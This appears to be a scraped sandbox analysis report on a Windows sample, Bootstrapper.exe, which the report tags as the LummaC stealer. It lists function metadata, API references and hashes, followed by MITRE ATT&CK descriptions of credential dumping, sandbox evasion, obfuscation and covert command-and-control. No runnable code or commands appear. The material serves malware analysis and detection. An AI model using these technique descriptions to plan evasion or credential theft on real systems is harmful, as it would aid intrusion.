String ID: minkernel\crts\ucrt\src\desktopcrt\env\get_environment_from_os.cpp
API String ID: 1494238470-170101930
Opcode ID: 9d4a50849d85dc7d5f2061fb768f923befc4906ac7d3683bb64257b9d06a7d82
Instruction ID: 2ebc82ab02c2656c33258cea08934aac8ac2a96ac4dc2962ea1dc609cf4a7bf3
Opcode Fuzzy Hash: 9d4a50849d85dc7d5f2061fb768f923befc4906ac7d3683bb64257b9d06a7d82
Instruction Fuzzy Hash: 3731FE71D50108EBCF08FBA5D8569FEB778BF54340F904169E506B6192EF386B05DBA0

Function 0079B140 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

__abstract_cw.LIBCMTD ref: 0079B151
__hw_cw.LIBCMTD ref: 0079B17B
__abstract_cw.LIBCMTD ref: 0079B193

Strings

\8x, xrefs: 0079B16F, 0079B1E9, 0079B1C3, 0079B1E2, 0079B1D0, 0079B177, 0079B17A
\8x, xrefs: 0079B15F, 0079B162, 0079B1A7, 0079B1AA

Memory Dump Source

Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID: __abstract_cw$__hw_cw
String ID: \8x$\8x
API String ID: 4195799695-1529206843
Opcode ID: 8caad265f1aef481bd4d3ab2b873621c97f6665f14878788d2d3bf22011d6c07
Instruction ID: 1957b789c50be8bcce16efc84b62d75fb48525e626e6b3d703720a0a0a38ce62
Opcode Fuzzy Hash: 8caad265f1aef481bd4d3ab2b873621c97f6665f14878788d2d3bf22011d6c07
Instruction Fuzzy Hash: 872137B6D0110CEBCF04DF95E9869AEB7B5FF44301F108595E829AB215E738EB40CB91

Function 0077D3A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

___vcrt_getptd.LIBVCRUNTIMED ref: 0077D3D3
___vcrt_getptd.LIBVCRUNTIMED ref: 0077D3E7
___vcrt_getptd.LIBVCRUNTIMED ref: 0077D3F7
___vcrt_getptd.LIBVCRUNTIMED ref: 0077D402

Strings

csm, xrefs: 0077D3C8

Memory Dump Source

Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID: ___vcrt_getptd
String ID: csm
API String ID: 984050374-1018135373
Opcode ID: ee06f970f7e79811b31bcd42f8ee169b03a7cfec19d0f880a40833c66d42d83b
Instruction ID: d22c4bc2d6dced75c8d676531d51be8e7fafeb59fadf3ba31d2dd6adbb4ae78c
Opcode Fuzzy Hash: ee06f970f7e79811b31bcd42f8ee169b03a7cfec19d0f880a40833c66d42d83b
Instruction Fuzzy Hash: 4311B778900208DFCF24EFA8C14959EBBB1EF48341B11C5A9E859A7311D778EE40DB92

Function 007A4150 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55timeCOMMON

Download Yara Rule

APIs

std::_Timevec::_Timevec.LIBCPMTD ref: 007A4186

Strings

minkernel\crts\ucrt\src\appcrt\stdio\_freebuf.cpp, xrefs: 007A416A
%ls, xrefs: 007A4161
public_stream != nullptr, xrefs: 007A415C

Memory Dump Source

Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID: TimevecTimevec::_std::_
String ID: %ls$minkernel\crts\ucrt\src\appcrt\stdio\_freebuf.cpp$public_stream != nullptr
API String ID: 4219598475-1254537880
Opcode ID: 298a7ca70164ba729f054f26bd2e75562d162c45e7f848da5cf37e7895194e35
Instruction ID: 23a7d9c064fe252713e35e8b15a0c4343d8bda68e7a6fa146e4a9adda32fa598
Opcode Fuzzy Hash: 298a7ca70164ba729f054f26bd2e75562d162c45e7f848da5cf37e7895194e35
Instruction Fuzzy Hash: CD11A070950108EADB08FB50CD4BBEE7668AFA1300FA04168F5051A1D2EFB99F45DB90

Function 007963B0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 205COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(0000FDE9,?), ref: 007963E3

Strings

z, xrefs: 007966B7
, xrefs: 007964B4

Memory Dump Source

Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID: Info
String ID: $z
API String ID: 1807457897-2251613814
Opcode ID: 0ffc794a850c7c530e9e48a9ec9eacaaa27d54cbced1b8fc2c2b7ea4e67a2269
Instruction ID: 6ed1786a1ca85da2c0e883781ec7be91abd3464b524ef4519645582acd4e2d49
Opcode Fuzzy Hash: 0ffc794a850c7c530e9e48a9ec9eacaaa27d54cbced1b8fc2c2b7ea4e67a2269
Instruction Fuzzy Hash: 34A13B74A4825C9FDF25CF88D891BE9BB71EF44308F1481D9D94D5B282C278AB92CF94

Function 007A6590 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,?,007A7228,?,007A13AF,?,00000000), ref: 007A66E9
GetLastError.KERNEL32(?,007A7228,?,007A13AF,?,00000000), ref: 007A66F3

Strings

(rz, xrefs: 007A65CC

Memory Dump Source

Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: (rz
API String ID: 442123175-1690717468
Opcode ID: 2a723332de8f49fea46c34ee650f000e2edd95e63de3292949739cd21d73f9cc
Instruction ID: a9ff2ee5fb3e7638410fb94ffb6845f8d55d327d8fcfd122f2beb6d0c6fe41f9
Opcode Fuzzy Hash: 2a723332de8f49fea46c34ee650f000e2edd95e63de3292949739cd21d73f9cc
Instruction Fuzzy Hash: 7151A274A04229DFCB25CF19C9909D9BBB1BF89304F5482E9E90DA7361D630AEC1CF94

Function 0077D290 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

___vcrt_getptd.LIBVCRUNTIMED ref: 0077D2DE
___vcrt_getptd.LIBVCRUNTIMED ref: 0077D2F2

Strings

csm, xrefs: 0077D2A9

Memory Dump Source

Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID: ___vcrt_getptd
String ID: csm
API String ID: 984050374-1018135373
Opcode ID: 9a0da2e733e8609290bb25c5df378773302faf9a4585aeadbcd346f8ee945a77
Instruction ID: 55ddb1ba822313e3e8568c12ab97ca577674ded2f0c0a1dd942f5600b3cd0255
Opcode Fuzzy Hash: 9a0da2e733e8609290bb25c5df378773302faf9a4585aeadbcd346f8ee945a77
Instruction Fuzzy Hash: 5E010878A00208EFCF28DFA5C1458AEBBB6BF44341B608198D8485B316D735DF42DB92

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Bootstrapper.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
Bootstrapper.exe

Function 007BE6C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104
nativeCOMMON

Function 007BE180 Relevance: 1.7, APIs: 1, Instructions: 162
memorynativeCOMMON

Function 007BE890 Relevance: .3, Instructions: 326
COMMON

Function 00799760 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 94
memoryCOMMON

Function 007979D0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103
timeCOMMON

Function 007BDFD0 Relevance: 1.6, APIs: 1, Instructions: 111
libraryCOMMON

Function 007BE450 Relevance: 1.6, APIs: 1, Instructions: 97
libraryCOMMON

Function 00799E40 Relevance: 1.5, APIs: 1, Instructions: 19
memoryCOMMON

Function 0077BCA0 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON